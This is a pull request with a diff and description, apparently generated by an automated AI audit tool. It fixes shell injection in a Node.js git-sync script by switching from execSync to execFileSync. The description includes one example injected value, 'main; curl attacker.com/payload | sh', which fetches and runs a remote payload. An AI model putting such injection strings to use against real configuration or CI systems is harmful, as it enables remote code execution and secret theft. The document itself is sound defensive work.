### PR TITLE
fix(security): replace execSync with execFileSync to prevent shell injection

### DIFF
--- a/scripts/sync-external.mjs
+++ b/scripts/sync-external.mjs
@@ -10,7 +10,7 @@
  *   node scripts/sync-external.mjs [--force] [--skill=name]
  */
 
-import { execSync } from "child_process";
+import { execSync, execFileSync } from "child_process";
 import { createHash } from "crypto";
 import { existsSync, mkdirSync, rmSync, cpSync, readFileSync, writeFileSync, readdirSync, statSync } from "fs";
 import { join, dirname } from "path";
@@ -125,13 +125,13 @@ for (const skill of sources.skills || []) {
     // Clone or fetch
     if (!existsSync(repoDir)) {
       console.log(`   Cloning ${skill.source.repo}...`);
-      execSync(`git clone --depth 1 --branch ${ref} ${repoUrl} ${repoDir}`, {
+      execFileSync("git", ["clone", "--depth", "1", "--branch", ref, repoUrl, repoDir], {
         stdio: "pipe",
       });
     }
 
     // Get current commit hash
-    const commitHash = execSync(`git -C ${repoDir} rev-parse HEAD`, {
+    const commitHash = execFileSync("git", ["-C", repoDir, "rev-parse", "HEAD"], {
       encoding: "utf-8",
     }).trim();
 


### PR DESCRIPTION
> **Automated audit**: This PR was generated by [NLPM](https://github.com/xiaolai/nlpm-for-claude), a natural language programming linter, running via [claude-code-action](https://github.com/anthropics/claude-code-action). Please evaluate the diff on its merits.

## Bug

`scripts/sync-external.mjs` uses `execSync` with template-literal string interpolation to construct git commands. Two call sites pass values sourced directly from `sources.yaml`:

- **Line 128**: `execSync(\`git clone --depth 1 --branch ${ref} ${repoUrl} ${repoDir}\`, ...)`
  — `ref` and `repoUrl` come from `skill.source.ref` and `skill.source.repo`.
- **Line 134**: `execSync(\`git -C ${repoDir} rev-parse HEAD\`, ...)`
  — `repoDir` is derived from `skill.source.repo.replace("/", "-")` (only a single slash-to-hyphen substitution, leaving other metacharacters intact).

Because these strings are passed to a shell, a malicious or compromised `sources.yaml` entry — e.g. `ref: "main; curl attacker.com/payload | sh"` — would be executed as a shell command in the CI environment.

## Fix

Replace both `execSync` calls with `execFileSync` and pass arguments as an array. Node.js then invokes `git` directly via `execve`, bypassing the shell entirely, so metacharacters in YAML values are treated as literal strings.

```js
// Before
execSync(`git clone --depth 1 --branch ${ref} ${repoUrl} ${repoDir}`, { stdio: "pipe" });
const commitHash = execSync(`git -C ${repoDir} rev-parse HEAD`, { encoding: "utf-8" }).trim();

// After
execFileSync("git", ["clone", "--depth", "1", "--branch", ref, repoUrl, repoDir], { stdio: "pipe" });
const commitHash = execFileSync("git", ["-C", repoDir, "rev-parse", "HEAD"], { encoding: "utf-8" }).trim();
```

`execSync` is still imported because it is used on line 280 (`npm install --package-lock-only`), which does not interpolate external data.

## Why it matters

This script runs in a GitHub Actions workflow (`sync-skills.yml`) with write access to the repository. A shell injection here could exfiltrate secrets or tamper with synced skill content. The fix is minimal and fully backwards-compatible — the git commands behave identically.